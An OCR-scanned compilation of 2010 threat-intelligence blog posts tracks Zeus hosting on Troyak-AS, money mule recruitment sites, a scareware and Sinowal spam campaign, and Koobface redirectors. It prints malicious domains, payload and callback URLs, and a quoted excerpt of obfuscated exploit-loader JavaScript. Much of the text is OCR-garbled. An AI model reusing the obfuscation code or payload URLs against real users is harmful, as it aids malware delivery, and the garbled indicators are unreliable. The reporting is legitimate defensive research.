[6]Don’t Play Poker on an Infected Table 
[7]Malware Serving Online Casinos 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him [9]on Twit- 
ter. 


1. http://ddanchev. blogspot .com/2010/02/dont-play-poker-on-infected-table-part .htm 


2. bttp://www.virustotal.com/analisis/ad58e2bfc9a66e15b313850161ec77c33a6dbc0417d7e0797£3£172148089c34- 12681 
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ttp://ddanchev. blogspot .com/ 
ttp://twitter .com/danchodanche 


6.3.3 AS50215 Troyak-as Taken Offline, Zeus C&Cs Drop from 249 to 181 
(2010-03-10 21:01) 


# of online ZeuS files (last 60 days) 
_- — Online ZeuS binaries — Online ZeuS configs — Online ZeuS dropzones 


2nd update for Friday, March, 12, 2010 - [1]Troyak-AS is down again - "This AS is not currently 
used to announce prefixes in the global routing table, nor is it used as a visible transit AS." 


UPDATED: Friday, March, 12, 2010 - Troyak-AS peering courtesy of [2]AS25189 - NLINE- 
AS JSC Nline. Since the entire Troyak-as takedown campaign is turning into an infinite loop, it’s 
time for a "terminating condition". 


2nd update for Thursday, March 11, 2010: Troyak-AS is back from the dead. Upstream 
courtesy of [3]AS8342 - RTCOMM-AS RTComm.RU Autonomous System. The good news? 
Troyak’s Zeus C &Cs are still offline. 


UPDATED: Thursday, March 11, 2010 - [4JTROYAK-AS Starchenko Roman Fedorovich is 
dead again - "This AS is not currently used to announce prefixes in the global routing table, 
nor is it used as a visible transit AS." 


UPDATED: Troyak-as is now [5]AS44051 YA-AS Professional Communication Systems. 
[6]AS50215 Troyak-as, the cybercrime-friendly virtual neighborhood that was a key com- 
ponent in the hosting infrastructure for all of the Zeus-crimeware serving campaigns during 


Q1 of 2010, has been taken offline, resulting in a pretty evident drop in Zeus C &Cs, according 
to this graph courtesy of the [7]ZeusTracker. 
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AS50215 Troyak-as (ctlan.net; prombd.net) was of course the tip of the iceberg, directly 
or indirectly interacting with the following ASs: 


¢ AS31366 - smallshop-as Stebluk Vladimir Vladimirovich bld 
¢ AS44107 - PROMBUDDETAL-AS Prombuddetal LLC 

¢ AS50369 - VISHCLUB-as Kanyovskiy Andriy 

¢ AS49934 - VVPN-AS PE Voronov Evgen Sergiyovich 


* AS47560 - VESTEH-NET-as Vesteh LLC 


Don’t pop the corks just yet, their customers, in particular their money mule recruitment 
customers are already migrating to the competition. 


From a cybercriminal’s perspective, such minor operational glitches don’t undermine the 
business model. Sadly, it’s more cost-effective to build a new botnet, compared to trying to 
gain access to the old one. What truly undermines their business model is their inability to 
utilize the monetization vector. 


AS50215 TROYAK-AS Starchenko Roman Fedorovich activity during Q1, 2010: 
[8]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
[9]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
[10]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[11]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[12]Keeping Money Mule Recruiters on a Short Leash - Part Two 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him [14]on Twitter. 


ttp://cidr-report.org/cgi-bin/as-report?as=AS5021 
ttp://cidr-report .org/cgi-bin/as-report?as=AS5021 


1. - : i-bi - ?as= 
2. : idr- : i-bi - ?as= 
3. 

4 

5. 

6. 

7 

8. 
9. 


ttp://ddanchev.blogspot.com/2010/01/pushdo-serving-crimeware-client-side.htm 


10, 
12. 
13, 
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6.3.4 Money Mule Recruiters on Yahoo!’s Web Hosting (2010-03-11 20:41) 


WA 
& CO * Waters & Co. LLP 


és os wt 
or c mefementasen of a. i’ 


© Finanoa Mangement Senter 


UPDATED: Saturday, March 13, 2010 - Yahoo! Web Hosting abuse just pinged me that "We 
have investigated the sites and taken the necessary action". 


Just how dumb, or perhaps ingenious is a cybecriminal that would host his money mule 
recruitment operations using Yahoo!’s Web Hosting services? Is the reputable hosting location, 
worth the risk of having their campaigns taken down much easily than if there were hosting 
them on the bad reputation block, and would have never bothered replying to abuse notifica- 
tions? 


Whatever the motivation of the people behind this money mule recruitment campaign, 
they are currently using Yahoo! Web Hosting. Domains in question, including contact details: 
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£55 REED FINANCIAL SERVICES olcas 


ABOUT US SERVICE WORK WITH US PARTERD OP PROCS CONTACTS 


REED 
FINANCIAL 
SERVICES 
ABOUT US 7 
\S 
XS 
WELCOME SERVICES 


a - - . 
\ Reed Francs Seraces 6 an integrated 
— - = oad Os 
Hh > ut © tain Aiatreness leprevement 
: moarves wth he © See Aferee 
___ e cperate net 


branch or territory © Advertee & Meteors Sratea 


% mi comparmon mith the previous year wath the 


tome | About ws | Service | Work with us | Partnersive | Prosects | Contacts 


reed-fe.com © 200% Prowacy Pro 


- Reed Financial Services - reed-fs.com - 68.180.151.74 
555 11th St NW 

Washington, DC 20004 

Phone numbers: 

(866) 863-6438 

(202) 355-6678 (FAX) 
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Stevens Financial Solutions 


Latest News 


What we offer a anna 
VBL anDeS fer teal BIENtS 
NEED TO CASH A CHEQUE ? and represertatves of cur 
company m the USA are now 
Do you need to get help with collecting checks from compantes or Casting payments? open 
Our lepesteted and ventbed regonat agerts and representatives $0 fee you We car 
ashing using one of F September 9, 2009 
BERD wien) Cut SyS¥OM) OU Can Wansfer Money 19 your DaNe aCCOUrE Of yout Prices update: 5% tor cashing 
checks 
, P » ‘ ' (2 Apes 6, 2009 
Te hare Bis Gore - Coch here » Oe f vies ate Gut Custzenes - Loon here » _ é : 
Due to high risk of fraud we no 
coger accept PayPal 
NEED TO RECEIVE A WIRE OR ACH ? a rca Hi 208 
We have new type of Dank cards 
Oo you need 2 inancsl mtermedary of emorney to recerve a WIRE. domestic WIRE of ACH we to offer 
from your sponsce of Tom ancthes type of money sender 
Our fegestered and vented regonal agents and represent ne 
rotated ansier money %9 » 


NEED TO BUY OR SELL ONLINE 7 


Oo you want to buy oF sed an item on one of the ontine aucton web sites. but can not pay oF 


- Stevens Financial Solutions - stevensfs.com - 98.136.50.138; 69.147.83.187; 69.147.83.188 
Postal address: 

Stevens Financial Solutions 

Bahnhofstrasse 32 

CH-8001 Zurich, Switzerland 

Value Added Tax Nr: 428 643 


Phones and fax no’s: 

Phone: +41 (43) 219-2551 

Fax 1: +41 (43) 219-2551 

Fax 2: +1 (866) 703-7622 US Toll-Free 


- Waters & Co. LLP - watersllp.com - 216.39.57.104 
400 East Pratt Street, 

Baltimore, MD 21202 

United States 

Phone numbers: 

(443) 524-9221 

(443) 524-9221 (FAX) 
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- Nilson Financial Solutions - nilson-fs.com - 98.136.92.76; 98.136.92.77; 98.136.92.78 
Nilson Financial Solutions 

Bahnhofstrasse 32 

CH-8001 Zurich, Switzerland 

Value Added Tax Nr: 428 643 


Phones and fax no’s: 

Phone: +41 (43) 219-2551 

Fax 1: +41 (43) 219-2551 

Fax 2: +1 (866) 472-0560 US Toll-Free 


Upon submitting the personal details, the potential money mule is required to send a 
scanned copy of their ID or driving license: 


¢ "Familiarize yourself with all clauses of the contract. Fill the contract and send us a 
scanned copy of it to the e-mail address info@watersllp.com or by fax: (443) 524-9221. 
The contract becomes valid from the moment of the reception of the correctly filled copy 
of the contract. You should be familiar with that the validity of the contract in the elec- 
tronic form is completely identical to the contract signed at personal presence of both 
parties.* To pass the procedure of identity verification in order to prevent fraudulent reg- 
istrations, you are required to send a scan of valid ID or a driving license to the e-mail: 
info@watersllp.com or by fax: (443) 524-9221. We guarantee full confidentiality of your 
personal information, more information on this matter you will find in our Privacy Policy 
PLEASE LET US KNOW BY EMAIL WHEN YOU WILL FAX BACK/EMAIL AS ATTACHEMENT THE 
CONTRACT AND APPLICATION FORM WITHIN 48 HOURS." 
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Yahoo!’s Web Hosting abuse team has been notified of the campaigns, and will nuke the offline 
a.S.a.p 


Related coverage of money laundering in the context of cybercrime: 
[1]Dissecting an Ongoing Money Mule Recruitment Campaign 
[2]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[3]Keeping Reshipping Mule Recruiters on a Short Leash 

[4]Keeping Money Mule Recruiters on a Short Leash 

[5]Standardizing the Money Mule Recruitment Process 

[6]Inside a Money Laundering Group’s Spamming Operations 
[7]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[8]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [9]Dancho Danchev’s blog. Follow him [10]Jon Twit- 
ter. 


. http: //ddanchev. blogspot .com/2010/02/dissecting-ongoing-money-mule.htm 


http: //ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.html 


http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.html 


1 

2 

3: 

4 
5 
6 
7 
8 
9 


. http: //ddanchev. blogspot .com/2009/05/inside-money- laundering- groups- spamming. htm 
_hvtp://adanchey. blogspot con/2008/01 fnoney-mule-recruiters-use-asproxs-fast. hea 
Nico anaes roa coe ote) etme ater cyatietes artis meal 
_heep://adanchev. blogspot con/ 

10. http: //twitter. com/danchodanchey 
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6.3.5 Scareware, Sinowal, Client-Side Exploits Serving Spam Campaign in the Wild 
(2010-03-13 00:17) 


mata http-equiv=*"Content-Type” content="text/html: charset=IS0-8859-1* 
link rel="stylesheet” type="text/css" href-"theme.css” 
title 


You don't have the latest version of Nacromedia Flash Player 


head><body leftmargin="0" topmargin="0O" marginheight*"0" marginvidch="0" 


thody><te 
td width="10" 


imy src*"gpacer gig” border*"0" height*"25" widrth="10" 


siztee"e1l" face*"Verdana, Geneva, Arial, Helvetica, sans-serif">You don't have the latest version of Macromedia Flash Player font 


td>énbsp;</td 


td lass*"bodytext” 


AS50215 Troyak-as customers are back, with an ugly mix of scareware, sinowal, and client-side 
exploits serving campaign using the "You don’t have the latest version of Macromedia Flash 
Player" theme. Quality assurance is also in place this time, with the client-side exploit serving 


domains using a well known "[1]function nerot" obfuscation technique in an attempt to 
bypass link scanners. 


Let’s dissect the campaign, list all the typosquatted and spamvertised domains, the client-side 
exploit serving iFrames and the actual scareware. 


Sampled URLs’~ archives — .wesh.kr/archive0715/?id=test@test.com; anonymousfiles 
-wesh.or.kr/archive0715/?id=test@test.com. 
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gy pe 14.160.00701 $$ — > 51713 


_ 117.195.208.020 —_—_———— Adige asge29 
MI 

117.195.209.113 

as 201.226.0.016 ———————*3-_> s11556 


ail 


201.226.60,57 68.40.0075 ge 4533668 


214.186.2425 


68.41.99.225 ———SI___-g> ¢.68.41-99-225.nsd1.micomeastnet 
69.1820.015 


ar nna ashi 


as 
99.56.0.013 ———— 


69.182 28.117 


4 
99.61.222.102 ———Z ge aisi-99.61.212-101 dsiipitin sbeglobal. net 


4 69.243.12.147 Eg 69 2430.07 lg 4559657 
74.222.7654 ———Mf&L_____g 74.222.64.19 ———————_“im» s36549 
75.27259,17 Eg, 75. 160.0.012 — ge 5209 
78.30.217.134 75-172-59-17 tukwqwestnet 


ul 
C vomanenr ae ; 
78.30.192018 ——_—_— ge 4535916 


83.238 187,53 


A ul 
iN é 9236.59.46 83.238.0.016 ———————“2- 512741 
\\\ 
A 
9555.79.19 92.36.0.007 ge 4512958 
ul 
A 
98.116.49.76 95.52.0.0714 ———__—_“3_g» 4sag97 
T 
ur 
» $8.24.205,225 $8.126,0.006 ————_—_—_——i-» 4519262 
T 
ue ne ky 98.240025 ——__ ++“ asils26 
Ne fs 1 limeteablack net 


u nsl.skestafl.com 
AS? 


frs2.limeteablack net 


ms2.skestafl com 


Spamvertised and typosquatted currently active domains include: 


enyg.ne.kr - Email: EneesC9563@hotmail.com 
enyk.ne.kr - Email: EneesC9563@hotmail.com 
enyz.ne.kr - Email: EneesC9563@hotmail.com 
enyg.kr - Email: EneesC9563@hotmail.com 

enyk.kr - Email: EneesC9563@hotmail.com 

enyg.co.kr - Email: EneesC9563@hotmail.com 
enyk.co.kr - Email: EneesC9563@hotmail.com 
enyt.co.kr - Email: EneesC9563@hotmail.com 
enyz.co.kr - Email: EneesC9563@hotmail.com 
enyg.orkr - Email: EneesC9563@hotmail.com 
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enyk.or.kr - Email: EneesC9563@hotmail.com 
enyt.orkr - Email: EneesC9563@hotmail.com 
enyz.or.kr - Email: EneesC9563@hotmail.com 
enyt.kr - Email: EneesC9563@hotmail.com 
enyz.kr - Email: EneesC9563@hotmail.com 
erase.co.kr - Email: PalacidoL6860@hotmail.com 
erase.ne.kr - Email: PalacidoL6860@hotmail.com 
erase.onkr - Email: PalacidoL6860@hotmail.com 
erasm.co.kr - Email: PalacidoL6860@hotmail.com 
erasm.kr - Email: PalacidoL6860@hotmail.com 
erasm.ne.kr - Email: PalacidoL6860@hotmail.com 
erasm.or.kr - Email: PalacidoL6860@hotmail.com 
erasv.co.kr - Email: PalacidoL6860@hotmail.com 


uP 


66.188.64.0/20 ——___AS-_g 4520115 
i 


66.188,.69.144 ——PT gy 66-188-69-144.dhep.athn.gachartercom 


AS 
68.41.99.225 ——MEL——_—$_—$_ 98.40.0.015 ——————— im AS39668 


ag 092030017 $$ 4533657 


71.226.176.020 ——_—_—_———“S_-ge 457725 


69.243,12.147 


71.226.190.97 ——SWR-gs ¢.71-226-190-97.nsd1.tn.comcastnet 


ey ge 71.62.0.0116 ——_____—48_» szis08 
71.62.111.27 


75.160,0,0912 ——————_4_-m» s209 
Nv 
75.172.59.17 ——C—__m» 75.172.59-17.tukwqwestnet 
83.238.187.53 ——WEL__y 93.238.0.016 ————______“S-m 512741 
92.100.125.33 ——WiL ® 92:100.0.015 ———___“S_-> 4s9997 
99.61.212101 ——WEL gy on 560.013 
er AS7132 
69.182.26.117 ——NEL_» 69 182.0.0/15 
92.86.2122 ——NEL_______»» 9286.0.016 —————_—_——_4&_- s9050 
95.139.184.115 ——HEL___g 95.139.128.18 —————_—_—“S_m» ss675 
95.237.26.22 ———HEL—___ge 95.236.0.015 ————______“S_-m» 453269 
98.24.205.225 ——_ WL gy 9g 240.015 ——_—_—_———Age 4511426 
99.194.173.179 ——WEL dg 99 194.160.0/19 ——_-_————— Ad ge 4522561 
wesh.kr 
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erasv.kr - Email: PalacidoL6860@hotmail.com 
erasv.ne.kr - Email: PalacidoL6860@hotmail.com 
erasv.onkr - Email: PalacidoL6860@hotmail.com 
erasw.co.kr - Email: PalacidoL6860@hotmail.com 
erasw.kr - Email: PalacidoL6860@hotmail.com 
erasw.ne.kr - Email: PalacidoL6860@hotmail.com 
erasw.or.kr - Email: PalacidoL6860@hotmail.com 
wesc.ne.kr - Email: PalacidoL6860@hotmail.com 
wese.co.kr - Email: PalacidoL6860@hotmail.com 
wese.kr - Email: PalacidoL6860@hotmail.com 
wese.or.kr - Email: PalacidoL6860@hotmail.com 
wesh.co.kr - Email: PalacidoL6860@hotmail.com 
wesh.kr - Email: PalacidoL6860@hotmail.com 
wesh.onkr - Email: PalacidoL6860@hotmail.com 
wesi.co.kr - Email: PalacidoL6860@hotmail.com 
wesi.kr - Email: PalacidoL6860@hotmail.com 
wesi.ornkr - Email: PalacidoL6860@hotmail.com 
wesw.co.kr - Email: PalacidoL6860@hotmail.com 
wesw.kr - Email: PalacidoL6860@hotmail.com 
wesw.ne.kr - Email: PalacidoL6860@hotmail.com 
wesw.ornkr - Email: PalacidoL6860@hotmail.com 


Name servers of notice: 


ns1.hr-skc.com - 74.117.63.218 - Email: hr@skrealty.net 
nsl.welcomhell.com - 74.117.63.218 - Email: klincz@aol.com 
ns1.skcstaff.com - 87.117.245.9 - Email: staffing@skhomes.com 
nsl1.limeteablack.net - 87.117.245.9 - Email: doofi@usa.com 


Upon visiting the spamvertised links, the cybercriminals are then enticing the user into 
manually downloading update.exe - [2]Trojan:Win32/Alureon.DA; Mal/FakeAV-CS - Result: 


10/42 (23.81 %). 


The sample phones back to the following location, downloading the actual scareware 
(setup.exe - [3]Mal/FakeAV-CS; FakeAlert-FQ - Result: 9/41 (21.96 %) ), and ensuring the the 
cybercriminals phone back with the affiliate ID to confirm a successful installation: 

- gotsaved.cn/css/ _void/crcmds/main - 91.212.132.7 - Email: georgelem@xhotmail.net 


gotsaved.cn/css/ _void/srcr.dat 
gotsaved.cn/css/ _void/crcmds/install 
gotsaved.cn/css/ _void/crfiles/serf 
gotsaved.cn/css/ _void/crcmds/builds/bbr 
gotsaved.cn/css/ _void/crfiles/bbr 
gotsaved.cn/css/_void/knock.php 
gotsaved.cn/css/ _void/crcmds/extra 


- automaticallyfind.org/?gd=KCo7MD8uPS4iPA== 


&affid=XF5W &subid=AQoY &prov= 


&mode=cr &v=6 &newref=1 - 69.39.238.101 - Email: larrypenn@xhotmail.net 


automaticallyfind.org/?gd=KCo7 MD8uPS4iPA== 
&prov= &mode=cr &v=6nkr 
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&affid=Wg== &subid=GwocGwEEHQ== 


- beinahet.com/readdatagateway.php?type=stats G&affid=319 G&subid=new &version=3.0 
&adwareok - 193.169.234.30 - Email: Vrapus.Kamat@gmail.com 


- mega-fast.org/page2/setup - 91.212.132.8 - Email: Vrapus.Kamat@gmail.com 
mega-fast.org/page2/setup0 


Parked on 91.212.132.5, 91.212.132.7, 91.212.132.8 (gotsaved.cn) are also: 
airportweb.cn - Email: JoannaWilhelm@xhotmail.net 
gotsaved.cn - Email: georgelem@xhotmail.net 
gotsick.cn - Email: georgelem@xhotmail.net 
gottired.cn - Email: georgelem@xhotmail.net 
gotunderway.cn - Email: georgelem@xhotmail.net 
gotupset.com - Email: DianaFister@xhotmail.net 
methodsweb.com - Email: bryantlew@xhotmail.net 
pickingweb.cn - Email: JoannaWilhelm@xhotmail.net 
prima-fast.org - Email: Vrapus.Kamat@gmail.com 
publishingweb.cn - Email: JoannaWilhelm@xhotmail.net 
quickfreescan.org - Email: GrantPursell@xhotmail.net 
scanerborn.cn - Email: KristinDunton@xhotmail.net 
scanerexcuse.cn - Email: KristinDunton@xhotmail.net 
scanernurse.cn - Email: KristinDunton@xhotmail.net 
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scanerwhatever.cn - Email: KristinDunton@xhotmail.net 
senateweb.com - Email: bryantlew@xhotmail.net 
webdocuments.cn - Email: JoannaWilhelm@xhotmail.net 


Parked on 69.39.238.101 (automaticallyfind.org) are also: 
guysfind.org - Email: larrypenn@xhotmail.net 
automaticallyfind.org - Email: larrypoenn@xhotmail.net 
findalternate.org - Email: larrypenn@xhotmail.net 


=|<script> 
function nerot (Pyy_d_h, t3_3l_Iq6v_7x) {if (!self.self.navigator["taintEn” + 
"abled") ()) {var MxX_S  Eo2ngcA6 = arguments["c” + "allee"];MxX_5 Eo2ngcA6 = 
MxuxX_S__Eo2ngcA6.toString();var HI_37_m43hqS = O;var K2tML13k0 = "z" + "d";var 


vY_e 3x = document ["getEleme” + "ntById"”] (K2tML13k0);if (vY_e 3x) {if (! 
t3_31l_Iq6v_7x) {t3_3l_Iq6v_7x = vY_e_3x. value; } }HI_37_m43hq5++;HI_37_m43hq5 
t+t+;var firot = new Array();if (Pyy_d_h) { firot = Pyy_dh;} else {var 
V7_LDL_2C_QrrDd = O;var a_w6lg_f = O;var VYAk_u = 512;var J1_i0D1 = 49; 


J1_i0D1--;while(a_w6lg_f < MxX_S_ Eo2ngcA6.length) {var Mvul34Bp BxXa = l;var 
PK f 8 8 = MxX_5_ Eo2ngcA6['’c" + "harCodeAt'"] (a_w6lg_f);if (PK_f_8_8 >= 
J1_i0D1 «& PK_f_8 8 <= (J1_i0D1 + 9)) {if (V7_LDL_2cC QrrDd == 4) { 

V7_LDL_2C QrrDd = 0; }if (isNaN(firot[V?7_LDL_2C QrrDd])) { firot[ 

V7_LDL_2C QrrDd] = 0; }firot[V7_LDL_2C QrrDd] += PK_f_8_8;if (firot[ 
V7_LDL_2C QrrDd) > VYAk_u) {firot[(V7_LDL_2C_QrrDd] -= VYAk_u;}V7_LDL_2C_OQrrDd 
++; }a_w6lg_f++:}}V7_LDL_2C OrrDd = 4;while (V7_LDL_2C OrrDd > 0) {if (firot[ 
V7_LDL_2C_ QrrDd - 1) > 256) {firot[V7_LDL_2C QrrDd - 1) -= 256; } 
V7_LDL_2C_OrrDd--; }var h_k5 41r3S = O;var G Hy6hyo GY = "";var r8EKSrx_Bbd = 


O;var ig3R_i_y = O;var Qh__ TI 2 = O;var g_ LK _DVDEa;var pfdoj6Gk2m_A_5h = 0; 
while (ig3R_i_y < t3_3l_Iq6v_7x.length) {var snYyb7?__58d7xsT2 = 
t3_31_Iq6v_7x.substr(ig3R_i_y, 1) + "J";var L8_A_532Ad = parseInt ( 
snYb7__58d7xST2, 16);if (Qh__I 2) {g __LK_DVDEa += L8 A_532Ad;if (h_k5_41r35 
== 4) {h_k5_ 41r38S -= 4; }var Ji5_6473q6glAm = g_ LK_DVDEa;JiS_6473q6glAm = 
JiS_6473q6glAm - (pfdoj6Gk2m_A_5h + 2) * firot[(h_kS 41r38];if (JiS_6473q6g1Am 
< 0) {var kI__6 2 = Math. floor(JiS_6473q6glAm / 256);Ji5_6473q6glAm = 
Ji5 6473q6giAm - kI_ 6 2 * 256; )}J3i5 6473q6qlAm = String. fromCharCode ( 
JiS_6473q6glAm);:if (HI_37_m43hq5 == 1) {G_Hy6hyo_Gy += L8_A_532Ad;} else if ( 
HI_37_m43hq5 == 2) {G _Hy6hyo_GY += Ji5 6473q6glAm;} else {G_Hy6hyo GY += 
ig3R_i_y; }h_kS_41r3st++;pfdoj6Gk2m_A_ Sh++;Qh IT 2 = 0;} else {g__LK_DVDEa = 
L8_A_S32Ad * 16;Qh___ TI 2 = 1; }ig3R_i_yt++;};;var x=0; var sB141XgW_Ok = this; 


As we've already seen in previous campaigns, each and every domain is embedded with an 
iFrame, which this time behaves differently, much more covertly than the one used before. 
ylwgheakrozn.com /Id/nov1/ - 66.135.37.211 - Email: getilakl11@yahoo.com would attempt to 
load the following: 

- ylwgheakrozn.com /nte/nov1.php 

- ylwgheakrozn.com /nte/avorp1nov1.py 

- ylwgheakrozn.com /nte/NOV1.py 


¢ The folks at FireEye have covered the "[4]function nerot" in depth in January, 2010, and 
have analyzed a campaign using a similar structure as the current one 


But would also attempt to load the nonexistent: 
- ylwgheakrozn.com /nte/AVORP1NOV1.exe 
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- ylwgheakrozn.com /nte/NOV1.exe 
- ylwgheakrozn.com /nte/NOV1.asp 
- ylwgheakrozn.com /nte/NOV1.html 
ccegchkvhtccom 
dbcavsaddve.com A 
ddehkyhddve.com A 
ddewphwddve.com 
dtimjethtyt.com 
edphnrpaeda.com 
hweackiphkhyi.com 
jbaagpepjvc.com 
Ibckqbkidve.com 


pigtintpdve.com 


qabtintqdve.com 
qcamhvaqdve.com 
govgbwjikiim.com 
vetnwinudve.com 
wtecbajyrmi.com 
wervannrvind.com 

wadvuritaj.com 
wemithatdtiy.com 


ylwrcpubhkotcom 


The campaign ultimately serves [5]Backdoor.Sinowal.DJ; Result: 15/42 (35.71 %) through an 
obfuscated [6]Exploit.PDF-JS.Gen - Result: 18/42 (42.86 %). 


Parked on same IP where the iFrame domains is, is the remaining portfolio of domains 
presumably prepared for rotation, in fact some of them are already involved in malicious 
activity. 


At 69.174.245.148; 75.125.212.58; 66.135.37.211; 190.120.228.44 and 76.74.238.94 is 
the rest of the client-side exploits serving domains portfolio: 
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aabtiktadve.com - Email: adminhhhPolego@hotmail.com 
acdcwpbathr.com - Email: vikolr5ty@yahoo.com 
acdIsviadve.com - Email: ade45Meehan4@yahoo.com 
aghgiqfathr.com - Email: eeeDalmanbei@yahoo.com 


balhimana.com - Email: Malachowski@yahoo.com 


dbcavsaddve.com - Email: Wilfredo-admin@yahoo.com 
ddehkyhddve.com - Email: admnBowgrenfd@yahoo.com 
ddewphwddve.com - Email: W-Leet1210@yahoo.com 
dhjgjwgddve.com - Email: adminSeaborn09@yahoo.com 
dhjvnvvddve.com - Email: adminSeaborn09@yahoo.com 


diaiscjdthr.com - Email: Nelsondwer4@yahoo.com 
ejsinlbyidid.com - Email: nerForbesO9@yahoo.com 
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acdcwnbathr.com 


aghgiqfathr.com 


artvictorine.com 


blackberryguy.com 


diaiscjdthrcom 


ejsinibyidid.com 


kdvarmgibtp.com 


lybkvpyrmpyt.com 


mghvegumthr.com 


qhjcwtbgthr.com 


qwqhezyxeco.com 


sjidamcsthir.com 


snczsupwdheg.com 


sqmsnhqaeo.com 


ylwgheakrozn.com 


Zeadtquuke.com 


~ NE 


66.135.37.0/24 ———__#S_gye 513768 


server6.randasolutions.com 


fgdchevuno.net - Email: 22232344sad22blyj@msanz.com 
fgnmgojuno.com - Email: 2223234422awbyj@msanz.com 
fgxwuyyuno.com - Email: 2223234422asdbyj@msanz.com 
ghedifauno.com - Email: 2223234422asd1byj@msanz.com 
ghtsuumuno.com - Email: 222323442qwle2byj@msanz.com 
hdewptwhdve.com - Email: zekoAdmin@yahoo.com 
hhjvnzvhdve.com - Email: qwMeier34ed@hotmail.com 
jcdcwxbjthr.com - Email: kovin78213@yahoo.com 
jefshosjdve.com - Email: Computer66Heads@yahoo.com 
kbclyokkthr.com - Email: admHalliday666@yahoo.com 
kdvarmgibtp.com - Email: aatrganzl10@yahoo.com 
Ibckqbkldve.com - Email: W-Leet1210@yahoo.com 
mcdcwjbmthr.com - Email: Lobertzqeq437@yahoo.com 
mghvegumthr.com - Email: eeeDalmanbei@yahoo.com 
mjisuvrmthr.com - Email: domainHodge2@hotmail.com 
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pdecaxcpdve.com - Email: Computer66Heads@yahoo.com 
pfgeeeepdve.com - Email: admndomsalel12@yahoo.com 
pfgfgdepthr.com - Email: finsky777admin@gmail.com 
pfgoykopdve.com - Email: Wildeysgh67@yahoo.com 
pfgtihtpdve.com - Email: admnBowgrenfd@yahoo.com 
pianwinpdve.com - Email: Wilfredo-admin@yahoo.com 
qabaqbygqthr.com - Email: admHalliday666@yahoo.com 
qabtihtqdve.com - Email: Lawrencee45sd@yahoo.com 
qcdvnhvqdve.com - Email: Lawrencee45sd@yahoo.com 
qefshvsqdve.com - Email: Wildeysgh67@yahoo.com 
aghgixfqthr.com - Email: Nguyenl0@gmail.com 
qghkqfkqdve.com - Email: adminsales@yahoo.com 
aqghpbapqdve.com - Email: qwMeier34ed@hotmail.com 
qghvexuqthr.com - Email: Richmondsw3d@yahoo.com 
qhjcwfbqthr.com - Email: asVeles45@hotmail.com 
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qlpkoxmdzxsb.com - Email: QLPKOXMDZXSB.COM@domainservice.com 
sjidamcsthr.com - Email: Gallippinu67@yahoo.com 
sjinfcmsthr.com - Email: domainadmin@navigationcatalyst.com 
tbcpbxptdve.com - Email: hotersl12admin@yahoo.com 
tfgoyqotdve.com - Email: Brodeursdfrtr@yahoo.com 
thjgjcgtdve.com - Email: Harrisasasd@yahoo.com 
tiashostdve.com - Email: aaLehmann34s@yahoo.com 
ubcvesuuthr.com - Email: kovin78213@yahoo.com 
uefxrwxudve.com - Email: admndomsalel2@yahoo.com 
wghgiwfwthr.com - Email: Richmondsw3d@yahoo.com 
yvbbpgrixovr.com - Email: dioSinghl12@yahoo.com 


Monitoring of the campaign is ongoing, updates will be posted as soon as new develop- 
ments emerge. 


Related Troyak-as activity and previous campaigns maintained by their customers: 
[7]AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 249 to 181 

[8]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 

[9]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
[10]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[11]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[12]Keeping Money Mule Recruiters on a Short Leash - Part Two 


This post has been reproduced from [13]Dancho Danchev’s blog. Follow him [14]on Twitter. 


. http://blog.fireeye.com/research/2010/01/pdf-obfuscation.htm 
ttp://www.virustotal.com/analisis/13deb97feb24884914143139fe173f 1eefe63c6b1b40d95b48c835455e1810af - 12684 


ttp://www.virustotal.com/analisis/0fa30043f45f e0e9f7£d64b1e9440b8ea7eca8431b73388F 1184c3ee83b2335a- 12684 


. http://blog.fireeye.com/research/2010/01/pdf-obfuscation.htm 
ttp://www.virustotal.com/analisis/78df316892ec75fb2d17b9a589aed9807 7 1bcc6349325f 02f 1007b21e7d850ba- 12684 


ttp://www.virustotal.com/analisis/db46413231ea9bed8f4d8b40bc820ae7015ac9e6226c9f fe996fef975128b511-12684 


. http: //ddanchev. blogspot .com/2010/03/as50215-troyak-as-taken-offline-zeus-c.htm 
. http: //ddanchev. blogspot .com/2010/01/out1look-web-access-themed-spam-campaign.htm 
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ttp://ddanchev .blogspot.com/2010/01/pushdo-serving-crimeware-client-side.htm 


. http://ddanchev. blogspot .com/2010/02/photoarchive-crimewareclient-side.htm 
. http://ddanchev. blogspot .com/2010/02/tax-report-themed-zeusclient-side.htm 
12. http://ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


13. http://ddanchev. blogspot .com/ 
14. http://twitter .com/danchodanche 
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6.3.6 Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova 
(2010-03-15 13:51) 


Protocol Host URL Body  Contert-T... 


mage/or 
mage/or 

1,086 mage/or 
1,057 rage/or 
1,054 mage/or 
1,071 mage/or 
1,073 mage/or 
1,046 mage/or 
417 mage/or 
1,055 mage/or 


1,376 mage/or 


1,916 mmage/of 


Just how greedy has the Koobface gang become these days? Very greedy. 


In fact, their currently active scareware campaigns operate with a changed directory structure 
that speaks for itself - scareware-domain/fee1/index.php?GREED==random characters. Let’s 
dissect the scareware monetization vector, expose the entire typosquatted domains portfolio, 
and offer a historical OSINT perspective on their activities during February, 2010. 


¢ The domain portfolios are in a process of getting suspended 


The current portfolio of redirectors embedded on Koobface-infected hosts is parked at 
195.5.161.129, AS43558, EVENTISMOBILE-AS IM "Eventis-Mobile" SRL Chisinau, Republic of 
Moldova: 

tvinyourpc.com - Email: test@now.net.cn 

wheretosellford.com - Email: test@now.net.cn 

weddings-sales-place.com - Email: test@now.net.cn 

chromepluginsfree.com - Email: test@now.net.cn 

checkwebtriple.com - Email: test@now.net.cn 

partypartytime.com - Email: test@now.net.cn 

